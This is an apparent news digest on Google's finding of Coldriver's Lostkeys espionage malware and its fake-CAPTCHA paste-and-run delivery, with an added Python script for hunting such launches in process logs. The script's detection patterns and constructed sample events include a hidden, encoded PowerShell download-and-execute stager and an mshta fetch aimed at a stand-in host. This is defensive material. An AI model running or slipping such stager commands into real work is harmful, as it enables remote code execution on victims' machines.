Russian state-linked Coldriver spies add new malware to operation

Researchers at Google have identified a new piece of malware, Lostkeys, which they attribute to the Russian state-backed hacking group known as Coldriver. The discovery marks a notable expansion of the group's ongoing espionage effort, which targets high-profile figures primarily through phishing campaigns.

Key Points

  • The new malware, Lostkeys, was observed in attacks as recently as April 2025.
  • Coldriver has been implicated in espionage against diplomats, military advisers, journalists and NGOs connected to NATO.
  • Lostkeys steals files with specific extensions from specific directories and sends system information back to its operators.
  • It is delivered through a fake CAPTCHA verification page that tricks the victim into running the malicious code themselves.
  • Coldriver's main focus remains credential theft, used to gain access to targets' emails and documents.

Content Summary

Coldriver, a hacking group associated with Russian intelligence, has expanded its arsenal with Lostkeys, a new malware built for espionage. Discovered by Google researchers, it is used primarily to steal data from high-profile individuals and organisations critical of the Russian government. Delivery relies on a phishing page that imitates a legitimate CAPTCHA check in order to get the victim to install the malicious code on their own system. Historically, Coldriver has targeted professionals and sectors opposed to Russian policy, particularly in Eastern Europe and the US.
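Because the lure gets the victim to launch the code themselves, the telemetry worth hunting in is process creation: a script host started from the user's interactive shell with command-line traits that a hand-typed command rarely has. The Python below is an added example for this page, not Google's analysis and not anything taken from Coldriver's tooling. The Sysmon-style key=value log format, the indicator list and every sample event are constructed assumptions (the encoded payload is built from a plaintext inside the script so the round trip is exact), and the heuristic is a generic one for paste-and-run lures rather than a Lostkeys signature.

```python
"""Hunting heuristic for 'paste-and-run' lures, where a fake verification page
talks the victim into launching a command themselves.

Added example for this page: not Google's, not Coldriver-specific, not from the
article.  Log format, field names, indicator list and all sample events are
constructed for illustration."""
import base64
import binascii
import re

# Assumption: one Sysmon Event ID 1 style event per line, as key=value pairs,
# with values containing spaces wrapped in double quotes.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# On Windows a command launched from the Run dialog or Start menu runs as a
# child of explorer.exe, so that parent marks a user-launched process.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits a person typing a normal command rarely produces.
INDICATORS = {
    "encoded command": re.compile(r"(?<!\S)-(?:ec|enc|encodedcommand)(?!\S)", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
    "no profile": re.compile(r"(?<!\S)-nop(?:rofile)?(?!\S)", re.I),
    "in-memory download/exec": re.compile(
        r"invoke-expression|\biex\b|downloadstring|invoke-webrequest|\biwr\b|"
        r"\bcurl\b|\bwget\b|\bcertutil\b", re.I),
    "remote url": re.compile(r"https?://", re.I),
}


def parse_event(line):
    """Turn 'k=v k="v with spaces"' into a dict of field -> value."""
    return {k: (q if q else b) for k, q, b in _KV.findall(line)}


def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand payload, or None.
    PowerShell expects base64 of UTF-16LE text, so that is what we undo."""
    m = re.search(r"(?<!\S)-(?:ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_command_line(cmdline):
    """Names of indicators found in the raw command line and in any decoded payload."""
    reasons = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        reasons += [f"{name} (decoded)" for name, rx in INDICATORS.items()
                    if rx.search(decoded)]
    return reasons


def analyze(event):
    """Reasons to flag one event; an empty list means no finding."""
    if basename(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return []
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    return score_command_line(event.get("CommandLine", ""))


def hunt(lines):
    """Return (event, reasons) for every event worth an analyst's look."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        reasons = analyze(ev)
        if reasons:
            findings.append((ev, reasons))
    return findings


# Constructed sample telemetry.  The encoded payload is built from a plaintext
# here so the decode round-trips; it is not a real stager from any campaign.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://captcha-check.invalid/v')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    f'EventID=1 Image="{PS}" ParentImage="C:\\Program Files\\Microsoft VS Code\\Code.exe" CommandLine="powershell.exe -NoLogo"',
    f'EventID=1 Image="C:\\Windows\\System32\\notepad.exe" ParentImage="{EXPLORER}" CommandLine="notepad.exe notes.txt"',
    f'EventID=1 Image="{PS}" ParentImage="{EXPLORER}" CommandLine="powershell.exe Get-Process"',
    f'EventID=1 Image="{PS}" ParentImage="{EXPLORER}" CommandLine="powershell.exe -w hidden -nop -enc {SAMPLE_ENCODED}"',
    f'EventID=1 Image="C:\\Windows\\System32\\mshta.exe" ParentImage="{EXPLORER}" CommandLine="mshta https://captcha-check.invalid/verify.hta"',
]

if __name__ == "__main__":
    for ev, reasons in hunt(SAMPLE_EVENTS):
        print(basename(ev["Image"]), "<-", basename(ev["ParentImage"]), ":", ", ".join(reasons))
```

Only the encoded PowerShell launch and the mshta fetch are flagged; the interactive `Get-Process` and the editor-spawned shell are not, which is the point of requiring both the explorer.exe parent and at least one indicator rather than alerting on every PowerShell start. Decoding the `-enc` argument matters because the raw command line of a paste-and-run stager often carries nothing more telling than the encoding flag itself.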

Context and Relevance

This article illustrates how state-linked espionage groups keep adapting their tooling and lures in the current geopolitical climate. People and organisations in the roles these groups target, such as diplomats and journalists, in particular need to follow such developments.

Why should I read this?

If you’re interested in cybersecurity, geopolitics, or just love staying ahead of the latest threats, this article is a must-read. The insights into Coldriver’s operations and the specifics of the Lostkeys malware give you a behind-the-scenes look at the relentless cyber warfare shaping today’s global relations. It’s like having a front-row seat to the digital battleground!